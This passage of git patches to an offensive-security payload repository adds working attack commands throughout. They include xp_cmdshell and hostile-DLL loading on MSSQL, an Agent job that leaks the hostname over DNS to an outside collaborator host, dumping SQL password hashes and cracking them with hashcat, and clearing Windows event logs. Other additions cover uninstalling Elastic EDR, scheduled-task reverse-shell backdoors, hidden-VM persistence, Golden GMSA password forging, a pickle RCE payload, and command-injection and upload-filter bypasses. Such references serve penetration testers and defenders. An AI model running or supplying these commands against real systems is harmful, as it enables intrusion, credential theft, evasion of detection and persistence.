+ RECONFIGURE;
+ ```
+* If the procedure was uninstalled
+ ```sql
+ sp_addextendedproc 'xp_cmdshell','xplog70.dll'
+ ```
+
+
## Extended Stored Procedure
### Add the extended stored procedure and list extended stored procedures
```ps1
+# Create evil DLL
Create-SQLFileXpDll -OutFile C:\temp\test.dll -Command "echo test > c:\temp\test.txt" -ExportName xp_test
+
+# Load the DLL and call xp_test
Get-SQLQuery -UserName sa -Password Password1234 -Instance "" -Query "sp_addextendedproc 'xp_test', '\\10.10.0.1\temp\test.dll'"
Get-SQLQuery -UserName sa -Password Password1234 -Instance "" -Query "EXEC xp_test"
+
+# Listing existing
Get-SQLStoredProcedureXP -Instance "" -Verbose
```
+* Build a DLL using [xp_evil_template.cpp](https://raw.githubusercontent.com/nullbind/Powershellery/master/Stable-ish/MSSQL/xp_evil_template.cpp)
+* Load the DLL
+ ```sql
+ -- can also be loaded from UNC path or Webdav
+ sp_addextendedproc 'xp_calc', 'C:\mydll\xp_calc.dll'
+ EXEC xp_calc
+ sp_dropextendedproc 'xp_calc'
+ ```
+
## CLR Assemblies
Prerequisites:
@@ -322,6 +384,8 @@ GO
## OLE Automation
+* :warning: Disabled by default
+
### Execute commands using OLE automation procedures
```ps1
@@ -365,9 +429,21 @@ Subsystem Options:
–Subsystem Jscript
```
+```sql
+USE msdb;
+EXEC dbo.sp_add_job @job_name = N'test_powershell_job1';
+EXEC sp_add_jobstep @job_name = N'test_powershell_job1', @step_name = N'test_powershell_name1', @subsystem = N'PowerShell', @command = N'$name=$env:COMPUTERNAME[10];nslookup "$name.redacted.burpcollaborator.net"', @retry_attempts = 1, @retry_interval = 5 ;
+EXEC dbo.sp_add_jobserver @job_name = N'test_powershell_job1';
+EXEC dbo.sp_start_job N'test_powershell_job1';
+
+-- delete
+EXEC dbo.sp_delete_job @job_name = N'test_powershell_job1';
+```
+
### List All Jobs
```ps1
+SELECT job_id, [name] FROM msdb.dbo.sysjobs;
Get-SQLAgentJob -Instance "" -username sa -Password Password1234 -Verbose
```
@@ -541,7 +617,13 @@ SELECT SYSTEM_USER
### MSSQL Accounts and Hashes
```sql
-SELECT name, password_hash FROM sys.sql_logins
+MSSQL 2000:
+SELECT name, password FROM master..sysxlogins
+SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins (Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer.)
+
+MSSQL 2005
+SELECT name, password_hash FROM master.sys.sql_logins
+SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins
```
Then crack passwords using Hashcat : `hashcat -m 1731 -a 0 mssql_hashes_hashcat.txt /usr/share/wordlists/rockyou.txt --force`
@@ -557,4 +639,5 @@ Then crack passwords using Hashcat : `hashcat -m 1731 -a 0 mssql_hashes_hashcat.
* [PowerUpSQL Cheat Sheet & SQL Server Queries - Leo Pitt](https://medium.com/@D00MFist/powerupsql-cheat-sheet-sql-server-queries-40e1c418edc3)
* [PowerUpSQL Cheat Sheet - Scott Sutherland](https://github.com/NetSPI/PowerUpSQL/wiki/PowerUpSQL-Cheat-Sheet)
-* [Attacking SQL Server CLR Assemblies - Scott Sutherland - July 13th, 2017](https://blog.netspi.com/attacking-sql-server-clr-assemblies/)
\ No newline at end of file
+* [Attacking SQL Server CLR Assemblies - Scott Sutherland - July 13th, 2017](https://blog.netspi.com/attacking-sql-server-clr-assemblies/)
+* [MSSQL Agent Jobs for Command Execution - Nicholas Popovich - September 21, 2016](https://www.optiv.com/explore-optiv-insights/blog/mssql-agent-jobs-command-execution)
\ No newline at end of file
diff --git a/Methodology and Resources/Windows - Persistence.md b/Methodology and Resources/Windows - Persistence.md
index 5e3c9a2..e6a93a0 100644
--- a/Methodology and Resources/Windows - Persistence.md
+++ b/Methodology and Resources/Windows - Persistence.md
@@ -8,6 +8,7 @@
* [Antivirus Removal](#antivirus-removal)
* [Disable Windows Defender](#disable-windows-defender)
* [Disable Windows Firewall](#disable-windows-firewall)
+ * [Clear System and Security Logs](#clear-system-and-security-logs)
* [Simple User](#simple-user)
* [Registry HKCU](#registry-hkcu)
* [Startup](#startup)
@@ -87,6 +88,13 @@ NetSh Advfirewall set allprofiles state off
New-NetFirewallRule -Name morph3inbound -DisplayName morph3inbound -Enabled True -Direction Inbound -Protocol ANY -Action Allow -Profile ANY -RemoteAddress ATTACKER_IP
```
+### Clear System and Security Logs
+
+```powershell
+cmd.exe /c wevtutil.exe cl System
+cmd.exe /c wevtutil.exe cl Security
+```
+
## Simple User
Set a file as hidden
diff --git a/SQL Injection/MSSQL Injection.md b/SQL Injection/MSSQL Injection.md
index 1ee72f9..920e2ac 100644
--- a/SQL Injection/MSSQL Injection.md
+++ b/SQL Injection/MSSQL Injection.md
@@ -96,7 +96,7 @@ SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins (Nee
MSSQL 2005
SELECT name, password_hash FROM master.sys.sql_logins
-SELECT name + ‘-’ + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins
+SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins
```
## MSSQL Union Based
From d40e0556291289964936e8ed5304d2ac0de925fe Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Tue, 15 Mar 2022 11:15:44 +0100
Subject: [PATCH 39/50] Golden GMSA + Scheduled Task
---
Account Takeover/README.md | 8 ++
.../Active Directory Attack.md | 99 ++++++++++++-------
.../Windows - Persistence.md | 56 ++++++-----
3 files changed, 102 insertions(+), 61 deletions(-)
diff --git a/Account Takeover/README.md b/Account Takeover/README.md
index 8bc027e..23afbe2 100644
--- a/Account Takeover/README.md
+++ b/Account Takeover/README.md
@@ -10,6 +10,7 @@
* [Weak Password Reset Token](#weak-password-reset-token)
* [Leaking Password Reset Token](#leaking-password-reset-token)
* [Password Reset Via Username Collision](#password-reset-via-username-collision)
+ * [Account takeover due to unicode normalization issue](#account-takeover-due-to-unicode-normalization-issue)
* [Account Takeover Via Cross Site Scripting](#account-takeover-via-cross-site-scripting)
* [Account Takeover Via HTTP Request Smuggling](#account-takeover-via-http-request-smuggling)
* [Account Takeover via CSRF](#account-takeover-via-csrf)
@@ -116,6 +117,13 @@ Try to determine if the token expire or if it's always the same, in some cases t
The platform CTFd was vulnerable to this attack.
See: [CVE-2020-7245](https://nvd.nist.gov/vuln/detail/CVE-2020-7245)
+
+### Account takeover due to unicode normalization issue
+
+- Victim account: `demo@gmail.com`
+- Attacker account: `demⓞ@gmail.com`
+
+
## Account Takeover Via Cross Site Scripting
1. Find an XSS inside the application or a subdomain if the cookies are scoped to the parent domain : `*.domain.com`
diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md
index 5df6bc9..527b4f8 100644
--- a/Methodology and Resources/Active Directory Attack.md
+++ b/Methodology and Resources/Active Directory Attack.md
@@ -48,6 +48,7 @@
- [Password in AD User comment](#password-in-ad-user-comment)
- [Reading LAPS Password](#reading-laps-password)
- [Reading GMSA Password](#reading-gmsa-password)
+ - [Forging Golden GMSA](#forging-golden-gmsa)
- [Pass-the-Ticket Golden Tickets](#pass-the-ticket-golden-tickets)
- [Using Mimikatz](#using-mimikatz)
- [Using Meterpreter](#using-meterpreter)
@@ -1389,40 +1390,7 @@ or dump the Active Directory and `grep` the content.
ldapdomaindump -u 'DOMAIN\john' -p MyP@ssW0rd 10.10.10.10 -o ~/Documents/AD_DUMP/
```
-### Reading GMSA Password
-> User accounts created to be used as service accounts rarely have their password changed. Group Managed Service Accounts (GMSAs) provide a better approach (starting in the Windows 2012 timeframe). The password is managed by AD and automatically changed.
-
-#### GMSA Attributes in the Active Directory
-* `msDS-GroupMSAMembership` (`PrincipalsAllowedToRetrieveManagedPassword`) - stores the security principals that can access the GMSA password.
-* `msds-ManagedPassword` - This attribute contains a BLOB with password information for group-managed service accounts.
-* `msDS-ManagedPasswordId` - This constructed attribute contains the key identifier for the current managed password data for a group MSA.
-* `msDS-ManagedPasswordInterval` - This attribute is used to retrieve the number of days before a managed password is automatically changed for a group MSA.
-
-
-#### Extract NT hash from the Active Directory
-
-* [GMSAPasswordReader](https://github.com/rvazarkar/GMSAPasswordReader) (C#)
- ```ps1
- # https://github.com/rvazarkar/GMSAPasswordReader
- GMSAPasswordReader.exe --accountname SVC_SERVICE_ACCOUNT
- ```
-
-* [gMSADumper (Python)](https://github.com/micahvandeusen/gMSADumper)
- ```powershell
- # https://github.com/micahvandeusen/gMSADumper
- python3 gMSADumper.py -u User -p Password1 -d domain.local
- ```
-
-* Active Directory Powershell
- ```ps1
- $gmsa = Get-ADServiceAccount -Identity 'SVC_SERVICE_ACCOUNT' -Properties 'msDS-ManagedPassword'
- $blob = $gmsa.'msDS-ManagedPassword'
- $mp = ConvertFrom-ADManagedPasswordBlob $blob
- $hash1 = ConvertTo-NTHash -Password $mp.SecureCurrentPassword
- ```
-
-* [gMSA_Permissions_Collection.ps1](https://gist.github.com/kdejoyce/f0b8f521c426d04740148d72f5ea3f6f#file-gmsa_permissions_collection-ps1) based on Active Directory PowerShell module
### Reading LAPS Password
@@ -1470,7 +1438,7 @@ Get-AuthenticodeSignature 'c:\program files\LAPS\CSE\Admpwd.dll'
foreach ($objResult in $colResults){$objComputer = $objResult.Properties; $objComputer.name|where {$objcomputer.name -ne $env:computername}|%{foreach-object {Get-AdmPwdPassword -ComputerName $_}}}
```
- - From linux:
+ - From Linux:
* [pyLAPS](https://github.com/p0dalirius/pyLAPS) to **read** and **write** LAPS passwords:
```bash
@@ -1496,6 +1464,68 @@ Get-AuthenticodeSignature 'c:\program files\LAPS\CSE\Admpwd.dll'
ldapsearch -x -h -D "@" -w -b "dc=<>,dc=<>,dc=<>" "(&(objectCategory=computer)(ms-MCS-AdmPwd=*))" ms-MCS-AdmPwd`
```
+
+### Reading GMSA Password
+
+> User accounts created to be used as service accounts rarely have their password changed. Group Managed Service Accounts (GMSAs) provide a better approach (starting in the Windows 2012 timeframe). The password is managed by AD and automatically rotated every 30 days to a randomly generated password of 256 bytes.
+
+#### GMSA Attributes in the Active Directory
+* `msDS-GroupMSAMembership` (`PrincipalsAllowedToRetrieveManagedPassword`) - stores the security principals that can access the GMSA password.
+* `msds-ManagedPassword` - This attribute contains a BLOB with password information for group-managed service accounts.
+* `msDS-ManagedPasswordId` - This constructed attribute contains the key identifier for the current managed password data for a group MSA.
+* `msDS-ManagedPasswordInterval` - This attribute is used to retrieve the number of days before a managed password is automatically changed for a group MSA.
+
+
+#### Extract NT hash from the Active Directory
+
+* [GMSAPasswordReader](https://github.com/rvazarkar/GMSAPasswordReader) (C#)
+ ```ps1
+ # https://github.com/rvazarkar/GMSAPasswordReader
+ GMSAPasswordReader.exe --accountname SVC_SERVICE_ACCOUNT
+ ```
+
+* [gMSADumper (Python)](https://github.com/micahvandeusen/gMSADumper)
+ ```powershell
+ # https://github.com/micahvandeusen/gMSADumper
+ python3 gMSADumper.py -u User -p Password1 -d domain.local
+ ```
+
+* Active Directory Powershell
+ ```ps1
+ $gmsa = Get-ADServiceAccount -Identity 'SVC_SERVICE_ACCOUNT' -Properties 'msDS-ManagedPassword'
+ $blob = $gmsa.'msDS-ManagedPassword'
+ $mp = ConvertFrom-ADManagedPasswordBlob $blob
+ $hash1 = ConvertTo-NTHash -Password $mp.SecureCurrentPassword
+ ```
+
+* [gMSA_Permissions_Collection.ps1](https://gist.github.com/kdejoyce/f0b8f521c426d04740148d72f5ea3f6f#file-gmsa_permissions_collection-ps1) based on Active Directory PowerShell module
+
+
+### Forging Golden GMSA
+
+> One notable difference between a **Golden Ticket** attack and the **Golden GMSA** attack is that they no way of rotating the KDS root key secret. Therefore, if a KDS root key is compromised, there is no way to protect the gMSAs associated with it.
+
+* Using [GoldenGMSA](https://github.com/Semperis/GoldenGMSA)
+ ```ps1
+ # Enumerate all gMSAs
+ GoldenGMSA.exe gmsainfo
+ # Query for a specific gMSA
+ GoldenGMSA.exe gmsainfo --sid S-1-5-21-1437000690-1664695696-1586295871-1112
+
+ # Dump all KDS Root Keys
+ GoldenGMSA.exe kdsinfo
+ # Dump a specific KDS Root Key
+ GoldenGMSA.exe kdsinfo --guid 46e5b8b9-ca57-01e6-e8b9-fbb267e4adeb
+
+ # Compute gMSA password
+ # --sid : SID of the gMSA (required)
+ # --kdskey : Base64 encoded KDS Root Key
+ # --pwdid : Base64 of msds-ManagedPasswordID attribute value
+ GoldenGMSA.exe compute --sid S-1-5-21-1437000690-1664695696-1586295871-1112 # requires privileged access to the domain
+ GoldenGMSA.exe compute --sid S-1-5-21-1437000690-1664695696-1586295871-1112 --kdskey AQAAALm45UZXyuYB[...]G2/M= # requires LDAP access
+ GoldenGMSA.exe compute --sid S-1-5-21-1437000690-1664695696-1586295871-1112 --kdskey AQAAALm45U[...]SM0R7djG2/M= --pwdid AQAAA[..]AAA # Offline mode
+ ```
+
### Pass-the-Ticket Golden Tickets
Forging a TGT require the `krbtgt` NTLM hash
@@ -3555,3 +3585,4 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae
* [The Kerberos Key List Attack: The return of the Read Only Domain Controllers - Leandro Cuozzo](https://www.secureauth.com/blog/the-kerberos-key-list-attack-the-return-of-the-read-only-domain-controllers/)
* [AD CS: weaponizing the ESC7 attack - Kurosh Dabbagh - 26 January, 2022](https://www.blackarrow.net/adcs-weaponizing-esc7-attack/)
* [AD CS: from ManageCA to RCE - 11 February, 2022 - Pablo Martínez, Kurosh Dabbagh](https://www.blackarrow.net/ad-cs-from-manageca-to-rce/)
+* [Introducing the Golden GMSA Attack - YUVAL GORDON - March 01, 2022](https://www.semperis.com/blog/golden-gmsa-attack/)
\ No newline at end of file
diff --git a/Methodology and Resources/Windows - Persistence.md b/Methodology and Resources/Windows - Persistence.md
index e6a93a0..eb5f135 100644
--- a/Methodology and Resources/Windows - Persistence.md
+++ b/Methodology and Resources/Windows - Persistence.md
@@ -146,36 +146,38 @@ SharPersist -t startupfolder -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -
### Scheduled Tasks User
-Using native **schtask**
+* Using native **schtask** - Create a new task
+ ```powershell
+ # Create the scheduled tasks to run once at 00.00
+ schtasks /create /sc ONCE /st 00:00 /tn "Device-Synchronize" /tr C:\Temp\revshell.exe
+ # Force run it now !
+ schtasks /run /tn "Device-Synchronize"
+ ```
+* Using native **schtask** - Leverage the `schtasks /change` command to modify existing scheduled tasks
+ ```powershell
+ # Launch an executable by calling the ShellExec_RunDLL function.
+ SCHTASKS /Change /tn "\Microsoft\Windows\PLA\Server Manager Performance Monitor" /TR "C:\windows\system32\rundll32.exe SHELL32.DLL,ShellExec_RunDLLA C:\windows\system32\msiexec.exe /Z c:\programdata\S-1-5-18.dat" /RL HIGHEST /RU "" /ENABLE
+ ```
-```powershell
-# Create the scheduled tasks to run once at 00.00
-schtasks /create /sc ONCE /st 00:00 /tn "Device-Synchronize" /tr C:\Temp\revshell.exe
-# Force run it now !
-schtasks /run /tn "Device-Synchronize"
-```
+* Using Powershell
+ ```powershell
+ PS C:\> $A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\Users\Rasta\AppData\Local\Temp\backdoor.exe"
+ PS C:\> $T = New-ScheduledTaskTrigger -AtLogOn -User "Rasta"
+ PS C:\> $P = New-ScheduledTaskPrincipal "Rasta"
+ PS C:\> $S = New-ScheduledTaskSettingsSet
+ PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S
+ PS C:\> Register-ScheduledTask Backdoor -InputObject $D
+ ```
-Using Powershell
+* Using SharPersist
+ ```powershell
+ # Add to a current scheduled task
+ SharPersist -t schtaskbackdoor -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Something Cool" -m add
-```powershell
-PS C:\> $A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\Users\Rasta\AppData\Local\Temp\backdoor.exe"
-PS C:\> $T = New-ScheduledTaskTrigger -AtLogOn -User "Rasta"
-PS C:\> $P = New-ScheduledTaskPrincipal "Rasta"
-PS C:\> $S = New-ScheduledTaskSettingsSet
-PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S
-PS C:\> Register-ScheduledTask Backdoor -InputObject $D
-```
-
-Using SharPersist
-
-```powershell
-# Add to a current scheduled task
-SharPersist -t schtaskbackdoor -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Something Cool" -m add
-
-# Add new task
-SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Task" -m add
-SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Task" -m add -o hourly
-```
+ # Add new task
+ SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Task" -m add
+ SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Task" -m add -o hourly
+ ```
### BITS Jobs
From df8493e4e67fedfa8059721563d8220abebd4195 Mon Sep 17 00:00:00 2001
From: nerrorsec <42860825+nerrorsec@users.noreply.github.com>
Date: Thu, 24 Mar 2022 11:54:34 +0545
Subject: [PATCH 40/50] import os
---
Insecure Deserialization/Python.md | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/Insecure Deserialization/Python.md b/Insecure Deserialization/Python.md
index 41887f6..98e843e 100644
--- a/Insecure Deserialization/Python.md
+++ b/Insecure Deserialization/Python.md
@@ -32,7 +32,7 @@ Python 2.7 documentation clearly states Pickle should never be used with untrust
> The pickle module is not secure against erroneous or maliciously constructed data. Never unpickle data received from an untrusted or unauthenticated source.
```python
-import cPickle
+import cPickle, os
from base64 import b64encode, b64decode
class Evil(object):
@@ -47,4 +47,4 @@ print("Your Evil Token : {}").format(evil_token)
## References
* [Exploiting misuse of Python's "pickle" - Mar 20, 2011](https://blog.nelhage.com/2011/03/exploiting-pickle/)
-* [Python Pickle Injection - Apr 30, 2017](http://xhyumiracle.com/python-pickle-injection/)
\ No newline at end of file
+* [Python Pickle Injection - Apr 30, 2017](http://xhyumiracle.com/python-pickle-injection/)
From 89f0b93d43954bcc3858aaae306b392d33b9a4a1 Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Sun, 27 Mar 2022 19:50:33 +0200
Subject: [PATCH 41/50] Elastic EDR + VM Persistence
---
.../MSSQL Server - Cheatsheet.md | 1 +
.../Windows - Persistence.md | 57 +++++++++++++++++++
Upload Insecure Files/README.md | 22 +++----
3 files changed, 69 insertions(+), 11 deletions(-)
diff --git a/Methodology and Resources/MSSQL Server - Cheatsheet.md b/Methodology and Resources/MSSQL Server - Cheatsheet.md
index cfd9e9c..860d5b0 100644
--- a/Methodology and Resources/MSSQL Server - Cheatsheet.md
+++ b/Methodology and Resources/MSSQL Server - Cheatsheet.md
@@ -444,6 +444,7 @@ EXEC dbo.sp_delete_job @job_name = N'test_powershell_job1';
```ps1
SELECT job_id, [name] FROM msdb.dbo.sysjobs;
+SELECT job.job_id, notify_level_email, name, enabled, description, step_name, command, server, database_name FROM msdb.dbo.sysjobs job INNER JOIN msdb.dbo.sysjobsteps steps ON job.job_id = steps.job_id
Get-SQLAgentJob -Instance "" -username sa -Password Password1234 -Verbose
```
diff --git a/Methodology and Resources/Windows - Persistence.md b/Methodology and Resources/Windows - Persistence.md
index eb5f135..a95bd6f 100644
--- a/Methodology and Resources/Windows - Persistence.md
+++ b/Methodology and Resources/Windows - Persistence.md
@@ -32,6 +32,7 @@
* [sethc.exe](#sethc.exe)
* [Remote Desktop Services Shadowing](#remote-desktop-services-shadowing)
* [Skeleton Key](#skeleton-key)
+ * [Virtual Machines](#virtual-machines)
* [Domain](#domain)
* [Golden Certificate](#golden-certificate)
* [Golden Ticket](#golden-ticket)
@@ -56,6 +57,13 @@ PS> attrib +h mimikatz.exe
* [Sophos Removal Tool.ps1](https://github.com/ayeskatalas/Sophos-Removal-Tool/)
* [Symantec CleanWipe](https://knowledge.broadcom.com/external/article/178870/download-the-cleanwipe-removal-tool-to-u.html)
+* [Elastic EDR/Security](https://www.elastic.co/guide/en/fleet/current/uninstall-elastic-agent.html)
+ ```ps1
+ cd "C:\Program Files\Elastic\Agent\"
+ PS C:\Program Files\Elastic\Agent> .\elastic-agent.exe uninstall
+ Elastic Agent will be uninstalled from your system at C:\Program Files\Elastic\Agent. Do you want to continue? [Y/n]:Y
+ Elastic Agent has been uninstalled.
+ ```
### Disable Windows Defender
@@ -403,6 +411,54 @@ Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName -Credential \Administrator
```
+
+### Virtual Machines
+
+> Based on the Shadow Bunny technique.
+
+```ps1
+# download virtualbox
+Invoke-WebRequest "https://download.virtualbox.org/virtualbox/6.1.8/VirtualBox-6.1.8-137981-Win.exe" -OutFile $env:TEMP\VirtualBox-6.1.8-137981-Win.exe
+
+# perform a silent install and avoid creating desktop and quick launch icons
+VirtualBox-6.0.14-133895-Win.exe --silent --ignore-reboot --msiparams VBOX_INSTALLDESKTOPSHORTCUT=0,VBOX_INSTALLQUICKLAUNCHSHORTCUT=0
+
+# in \Program Files\Oracle\VirtualBox\VBoxManage.exe
+# Disabling notifications
+.\VBoxManage.exe setextradata global GUI/SuppressMessages "all"
+
+# Download the Virtual machine disk
+Copy-Item \\smbserver\images\shadowbunny.vhd $env:USERPROFILE\VirtualBox\IT Recovery\shadowbunny.vhd
+
+# Create a new VM
+$vmname = "IT Recovery"
+.\VBoxManage.exe createvm --name $vmname --ostype "Ubuntu" --register
+
+# Add a network card in NAT mode
+.\VBoxManage.exe modifyvm $vmname --ioapic on # required for 64bit
+.\VBoxManage.exe modifyvm $vmname --memory 1024 --vram 128
+.\VBoxManage.exe modifyvm $vmname --nic1 nat
+.\VBoxManage.exe modifyvm $vmname --audio none
+.\VBoxManage.exe modifyvm $vmname --graphicscontroller vmsvga
+.\VBoxManage.exe modifyvm $vmname --description "Shadowbunny"
+
+# Mount the VHD file
+.\VBoxManage.exe storagectl $vmname -name "SATA Controller" -add sata
+.\VBoxManage.exe storageattach $vmname -comment "Shadowbunny Disk" -storagectl "SATA Controller" -type hdd -medium "$env:USERPROFILE\VirtualBox VMs\IT Recovery\shadowbunny.vhd" -port 0
+
+# Start the VM
+.\VBoxManage.exe startvm $vmname –type headless
+
+
+# optional - adding a shared folder
+# require: VirtualBox Guest Additions
+.\VBoxManage.exe sharedfolder add $vmname -name shadow_c -hostpath c:\ -automount
+# then mount the folder in the VM
+sudo mkdir /mnt/c
+sudo mount -t vboxsf shadow_c /mnt/c
+```
+
+
## Domain
### User Certificate
@@ -464,3 +520,4 @@ kerberos::tgt
* [Persistence – Image File Execution Options Injection - @netbiosX](https://pentestlab.blog/2020/01/13/persistence-image-file-execution-options-injection/)
* [Persistence – Registry Run Keys - @netbiosX](https://pentestlab.blog/2019/10/01/persistence-registry-run-keys/)
* [Golden Certificate - NOVEMBER 15, 2021](https://pentestlab.blog/2021/11/15/golden-certificate/)
+* [Beware of the Shadowbunny - Using virtual machines to persist and evade detections - Sep 23, 2020 - wunderwuzzi](https://embracethered.com/blog/posts/2020/shadowbunny-virtual-machine-red-teaming-technique/)
\ No newline at end of file
diff --git a/Upload Insecure Files/README.md b/Upload Insecure Files/README.md
index e559385..0c633a0 100644
--- a/Upload Insecure Files/README.md
+++ b/Upload Insecure Files/README.md
@@ -1,13 +1,12 @@
# Upload
-Uploaded files may pose a significant risk if not handled correctly. A remote attacker could send a multipart/form-data POST request with a specially-crafted filename or mime type and execute arbitrary code.
+> Uploaded files may pose a significant risk if not handled correctly. A remote attacker could send a multipart/form-data POST request with a specially-crafted filename or mime type and execute arbitrary code.
## Summary
* [Tools](#tools)
* [Exploits](#exploits)
- * [Defaults extensions](#defaults-extension)
- * [Other extensions](#other-extensions)
+ * [Defaults extensions](#defaults-extensions)
* [Upload tricks](#upload-tricks)
* [Filename vulnerabilities](#filename-vulnerabilities)
* [Picture upload with LFI](#picture-upload-with-lfi)
@@ -53,18 +52,19 @@ Uploaded files may pose a significant risk if not handled correctly. A remote at
- Use double extensions : `.jpg.php`
- Use reverse double extension (useful to exploit Apache misconfigurations where anything with extension .php, but not necessarily ending in .php will execute code): `.php.jpg`
-- Mix uppercase and lowercase : `.pHp, .pHP5, .PhAr`
+- Random uppercase and lowercase : `.pHp, .pHP5, .PhAr`
- Null byte (works well against `pathinfo()`)
- * .php%00.gif
- * .php\x00.gif
- * .php%00.png
- * .php\x00.png
- * .php%00.jpg
- * .php\x00.jpg
+ * `.php%00.gif`
+ * `.php\x00.gif`
+ * `.php%00.png`
+ * `.php\x00.png`
+ * `.php%00.jpg`
+ * `.php\x00.jpg`
- Special characters
* Multiple dots : `file.php......` , in Windows when a file is created with dots at the end those will be removed.
- * Whitespace characters: `file.php%20`
+ * Whitespace characters: `file.php%20`, `file.php%0d%0a.jpg`
* Right to Left Override (RTLO): `name.%E2%80%AEphp.jpg` will became `name.gpj.php`.
+ * Slash: `file.php/`, `file.php.\`
- Mime type, change `Content-Type : application/x-php` or `Content-Type : application/octet-stream` to `Content-Type : image/gif`
* `Content-Type : image/gif`
* `Content-Type : image/png`
From 8a5e01f20dcdb7975aaee92cd25131b248fbd661 Mon Sep 17 00:00:00 2001
From: xplo1t-sec
Date: Wed, 30 Mar 2022 03:13:18 -0400
Subject: [PATCH 42/50] added new bypass
---
Command Injection/README.md | 7 +++++++
1 file changed, 7 insertions(+)
diff --git a/Command Injection/README.md b/Command Injection/README.md
index 9df048a..9b66cc2 100644
--- a/Command Injection/README.md
+++ b/Command Injection/README.md
@@ -18,6 +18,7 @@
* [Bypass with double quote](#bypass-with-double-quote)
* [Bypass with backslash and slash](#bypass-with-backslash-and-slash)
* [Bypass with $@](#bypass-with-)
+ * [Bypass with $()](#bypass-with-$())
* [Bypass with variable expansion](#bypass-with-variable-expansion)
* [Bypass with wildcards](#bypass-with-wildcards)
* [Challenge](#challenge)
@@ -209,6 +210,12 @@ echo $0
echo whoami|$0
```
+### Bypass with $()
+```powershell
+who$()ami
+who$(echo am)i
+```
+
#### Bypass with variable expansion
```powershell
From 4d8a45db5a9164c4a0e60ffc645586c621541893 Mon Sep 17 00:00:00 2001
From: xplo1t-sec
Date: Wed, 30 Mar 2022 03:14:41 -0400
Subject: [PATCH 43/50] added new bypass
---
Command Injection/README.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/Command Injection/README.md b/Command Injection/README.md
index 9b66cc2..5fdd66a 100644
--- a/Command Injection/README.md
+++ b/Command Injection/README.md
@@ -18,7 +18,7 @@
* [Bypass with double quote](#bypass-with-double-quote)
* [Bypass with backslash and slash](#bypass-with-backslash-and-slash)
* [Bypass with $@](#bypass-with-)
- * [Bypass with $()](#bypass-with-$())
+ * [Bypass with $()](#bypass-with--1)
* [Bypass with variable expansion](#bypass-with-variable-expansion)
* [Bypass with wildcards](#bypass-with-wildcards)
* [Challenge](#challenge)
From c885e7696744e28c4fa203982b6ee3f0a6a321ac Mon Sep 17 00:00:00 2001
From: xplo1t-sec
Date: Wed, 30 Mar 2022 03:16:37 -0400
Subject: [PATCH 44/50] added new bypass
---
Command Injection/README.md | 1 +
1 file changed, 1 insertion(+)
diff --git a/Command Injection/README.md b/Command Injection/README.md
index 5fdd66a..e98534a 100644
--- a/Command Injection/README.md
+++ b/Command Injection/README.md
@@ -214,6 +214,7 @@ echo whoami|$0
```powershell
who$()ami
who$(echo am)i
+who`echo am`i
```
#### Bypass with variable expansion
From 39d1c6e7d81d4b2c492d98c21c2b1c5d1c8cadc4 Mon Sep 17 00:00:00 2001
From: Ooggle <33269056+Ooggle@users.noreply.github.com>
Date: Sat, 9 Apr 2022 12:55:21 +0200
Subject: [PATCH 45/50] Add document blacklist bypass
---
XSS Injection/README.md | 1 +
1 file changed, 1 insertion(+)
diff --git a/XSS Injection/README.md b/XSS Injection/README.md
index f17abf3..5dee5d6 100644
--- a/XSS Injection/README.md
+++ b/XSS Injection/README.md
@@ -725,6 +725,7 @@ $ echo "